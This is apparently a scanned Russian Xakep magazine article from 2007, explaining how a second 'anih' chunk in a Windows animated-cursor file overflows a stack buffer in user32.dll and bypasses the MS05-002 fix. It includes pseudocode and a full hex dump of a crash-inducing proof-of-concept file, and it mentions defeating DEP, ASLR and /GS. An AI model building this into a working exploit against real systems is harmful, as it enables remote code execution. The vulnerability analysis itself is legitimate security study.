ÃÂœÃÂ°ÃÂ¹ - Xakep Online

More documents

Recommendations

Info

взлом анимированных курсоров, используется для хранения аудио- и видеоданных. Примерами RIFF являются avi, wav и midi-файлы. За анимированным курсором закреплен тэг «anih» (61h 6Eh 69h 68h), а сам чанк имеет следующую структуру: Структура чанка «anih» struct ANIChunk { char tag[4]; // ASCII-тэг «anih» DWORD size; // длина чанка в байтах char data[size]; // данные, описывающие «раскладку» курсора в файле } Образцы правильных анимированных курсоров можно выдернуть из штатной поставки Windows (они расположены в папке \WINNT\Cursors\). Ниже приведен фрагмент одного из них: Фрагмент дампа анимированного курсора coin.ani, позаимствованный из штатного комплекта поставки Windows 0000000000: 52 49 46 46 C2 1B 00 00 ? 41 43 4F 4E 4C 49 53 54 RIFF?? ACONLIST 0000000010: 48 00 00 00 49 4E 46 4F ? 49 4E 41 4D 0E 00 00 00 H INFOINAM? 0000000020: 53 70 69 6E 6E 69 6E 67 ? 20 43 6F 69 6E 00 49 41 Spinning Coin IA 0000000030: 52 54 26 00 00 00 4D 69 ? 63 72 6F 73 6F 66 74 20 RT& Microsoft 0000000040: 43 6F 72 70 6F 72 61 74 ? 69 6F 6E 2C 20 43 6F 70 Corporation, Cop 0000000050: 79 72 69 67 68 74 20 31 ? 39 39 33 00 61 6E 69 68 yright 1993 anih 0000000060: 24 00 00 00 24 00 00 00 ? 09 00 00 00 09 00 00 00 $ $ ? ? 0000000070: 00 00 00 00 00 00 00 00 ? 00 00 00 00 00 00 00 00 0000000080: 02 00 00 00 01 00 00 00 ? 4C 49 53 54 3A 1B 00 00 ? ? LIST:? 0000000090: 66 72 61 6D 69 63 6F 6E ? FE 02 00 00 00 00 02 00 framicon?? ? / 056 Несмотря на то что, по спецификациям от Microsoft, поле data может иметь произвольную (и формально ничем не ограниченную) длину, программисты из Microsoft своих собственных спецификаций не читают, размещая в dat'е структуру, состоящую ровно из 24h байт. Их функция user32. dll!LoadCursorIconFromFileMap, вызываемая из функции user32.dll!LoadAniIcon, копирует в буфер фиксированного размера посредством функции memcpy(dst, src, size), без всяких проверок size на корректность размера! Естественно, если size больше 24h, происходит классическое стековое переполнение с подменой адреса возврата и возможностью передачи управления на shell-код, находящийся здесь же, в массиве data. Для предотвращения переполнения компания eEye модифицировала функцию LoadCursorIc onFromFileMap (псевдокод которой приведен ниже), добавив явную проверку на размер. Точно так же поступала и Microsoft в своей заплатке, выпущенной под кодовым названием MS05-002. Исправленный псевдокод уязвимой функции LoadCursorIconFromFileMap, читающий чанки из анимационных файлов int LoadCursorIconFromFileMap( struct MappedFile* file, ...) { struct ANIChunk chunk; // 24h-байтовая структура struct ANIHeader header; ... // читаем первые 8 байт чанка (в них расположен ASCII-тэг) ReadTag(file, &chunk); // это наш тэг «anih»? if (chunk.tag == "anih") { // проверяем размер на корректность + if (chunk.size != 36) // добавлено MS05-002 и eEye // если размер != 24h, отваливаем + return 0; // читаем чанк в локальный буфер фиксированного размера ReadChunk(file, &chunk, &header); } Однако оказалось, что, если в файле присутствует более одного «anih»-чанка, второй и все последующие чанки обрабатывает совершенно другой код, сосредоточенный в функции USER32.DLL!LoadAniIcon и, естественно, работающий по той же схеме, что и первый (то есть никаких проверок не выполняющий), поскольку программисты из Microsoft уже давно освоили метод copy’n’paste, а выполнять аудит всего кода лень, да и времени нет: Псевдокод уязвимой функции LoadAniIcon, обрабатывающий второй и все последующие «anih»- чанки int LoadAniIcon( struct MappedFile* file, ...) { struct ANIChunk chunk; // 24h-байтовая структура struct ANIHeader header; ... while (1) { // читаем первые 8 байт чанка (в них расположен ASCII-тэг) ReadTag(file, &chunk); // в зависимости от типа тэга делаем либо то, либо другое switch (chunk.tag) { case 'seq ': // обрабатываем тэг «seq» ... case 'LIST': // обрабатываем тэг «LIST» ... case 'rate': // обрабатываем тэг «rate» ... xàêåð 05 /101/ 07
взлом структуру case 'anih': // обрабатываем тэг «anih» // читаем chunk.size в 24h-байтовую ReadChunk(file, &chunk, &header); Таким образом, чтобы пробить заплатку от eEye или официальный патч MS05-002 от Microsoft, необходимо поместить в ani-файл два чанка: правильный и вызывающий переполнение. Дамп одного из таких файлов приведен ниже. Он не несет на своем борту никакого shell-кода и «всего лишь» вызывает исключение при попытке просмотра анимированного курсора любым приложением, поддерживающим этот формат, например знаменитым Irfan Viewer: Полный дамп ani-файла, пробивающего заплатку от eEye вместе с официальным патчем MS05-002 от Microsoft 00000000 52 49 46 46 90 00 00 00 41 43 4F 4E 61 6E 69 68 RIFF....ACONanih 00000010 24 00 00 00 24 00 00 00 02 00 00 00 00 00 00 00 $...$........... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 01 00 00 00 61 6E 69 68 58 00 00 00 ........anihX... 00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000060 00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 .AAAAAAAAAAAAAAA 00000070 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 AAAAAAAAAAAA.... 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090 42 42 42 42 43 43 43 43 BBBBCCCC А что на счет Internet Exporer? Его, в отличие от Irfan Viewer, заставить выполнять shell-код не так-то просто. Помимо всего прочего, необходимо обойти защиту от выполнения кода в стеке (известную под кодовым именем DEP — Data Execution Prevention), обхитрить механизм рандомизации адресного пространства (ASLR — Address space layout randomization) и преодолеть проверку целостности адреса возврата, выполняемую функцией при трансляции программы компилятором Microsoft Visual C++ 7.x с ключом /GS. DEP, ASLR и /GS — вот три причины, по которым большинство эксплойтов отказывается работать на Висте, функционирующей на процессоре с поддержкой флагов NX/XD (аппаратный DEP). Все эти защиты достаточно легко обойти (впрочем, как и все остальное, сделанное Microsoft), но это уже тема совершенно другого разговора. Любопытствующих отсылаю к сборнику моих статей (http://nezumi.org.ru/vista-overstack-pack.zip), подробно рассматривающих методику борьбы со всей «святой троицей». z xàêåð 03 /99/ 07 / 057
Page 1:
МАй 05(101) 2007 22 секрет
Page 4 and 5:
meganewS 004 MegAneWS Все нов
Page 6:
meganews Дмитрий Трави
Page 10: meganews Гибридим теле
Page 14: meganews Уникальное пр
Page 17 and 18: meganews Макинтоши тож
Page 19 and 20: 476 $140 $195 >> ferrum mSi nx7600g
Page 21 and 22: S T T I C H T Y U B B E S T B U Y B
Page 24 and 25: ferrum $45 $85 razer deathadder К
Page 26 and 27: pc_zone кРис кАспеРски
Page 28 and 29: pc_zone DVD На диске теб
Page 30: pc_zone Пересчет CRC В з
Page 33 and 34: pc_zone секрета Google По
Page 35 and 36: pc_zone http:// Многочисл
Page 37 and 38: pc_zone Несколько борд
Page 39 and 40: pc_zone FAR хранит списо
Page 41 and 42: pc_zone Папка Recent хран
Page 43 and 44: implant Готовый височн
Page 45 and 46: implant Нервы височной
Page 48 and 49: implant Дейтерий трити
Page 50 and 51: implant Германский ток
Page 52 and 53: implant компенсируетс
Page 54 and 55: взлом кРис кАспеРс
Page 56 and 57: взлом ANI-формат: уда
Page 60 and 61: взлом M3lC1Y / m3lc1y@bk.ru, h
Page 62: взлом i Пользуясь с
Page 65 and 66: взлом var sock = new java.net.
Page 67 and 68: взлом Внешний вид п
Page 69 and 70: взлом Настройки Googl
Page 72 and 73: взлом леониД «R0id» с
Page 74: взлом ! Внимание! Ин
Page 77 and 78: взлом Хэши админск
Page 79 and 80: взлом Бажный ресур
Page 81 and 82: взлом Возможности
Page 83 and 84: взлом Пример: «select"u
Page 85 and 86: взлом «Три девицы п
Page 88 and 89: взлом Маг / mag@wapp.ru / I
Page 90 and 91: взлом Msn-аккаунты IM-
Page 92 and 93: взлом леониД «CR@WleR»
Page 94 and 95: взлом DVD На нашем DVD
Page 96 and 97: взлом Леонид «R0id» С
Page 98 and 99: сцена Мария «Mifrill»
Page 100: сцена 10240-процессор
Page 103 and 104: сцена DVD Команда HITB'
Page 105 and 106: сцена Хакер - офици
Page 108 and 109:
сцена ильЯ АлексАн
Page 110 and 111:
unixoid Сергей «grinder» Я
Page 112 and 113:
unixoid Установка новы
Page 114 and 115:
unixoid Крис Касперски
Page 116 and 117:
unixoid Консольная вер
Page 118 and 119:
unixoid Linux в гостях у Fr
Page 120 and 121:
unixoid i Для тех отваж
Page 122 and 123:
coding АнДРей «littleBUddA»
Page 124 and 125:
coding Несколько слов
Page 126 and 127:
coding Deeoni$ / DeeoniS@gmail.com
Page 128 and 129:
coding RegMon показывает,
Page 130 and 131:
coding боРис вольфсон
Page 132 and 133:
coding Вот так будет в
Page 134 and 135:
coding Крис Касперски
Page 136 and 137:
креатиff meganews /134
Page 138 and 139:
креатиff meganews расте
Page 140 and 141:
units сТепАн «Step» иль
Page 142:
РЕДАКЦИОННАЯ ПОДПИ
Page 145 and 146:
units magazine@real.xakep.ru не
Page 147 and 148:
Íàäåæíûé ñòîðîæåâî
Page 149 and 150:
ХАКЕР.PRO Настройки
Page 151 and 152:
ХАКЕР.PRO Выбор типа
Page 153 and 154:
ХАКЕР.PRO Синхрониза
Page 155 and 156:
ХАКЕР.PRO на. Его рек
Page 157 and 158:
ХАКЕР.PRO Использова
Page 159 and 160:
ХАКЕР.PRO Активные с
Page 161 and 162:
ХАКЕР.PRO Внутри дом
Page 165:
2007 x 05(МАЙ)101 101
show all

ÃÂœÃÂ°ÃÂ¹ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂœÃÂ°ÃÂ¹ - Xakep Online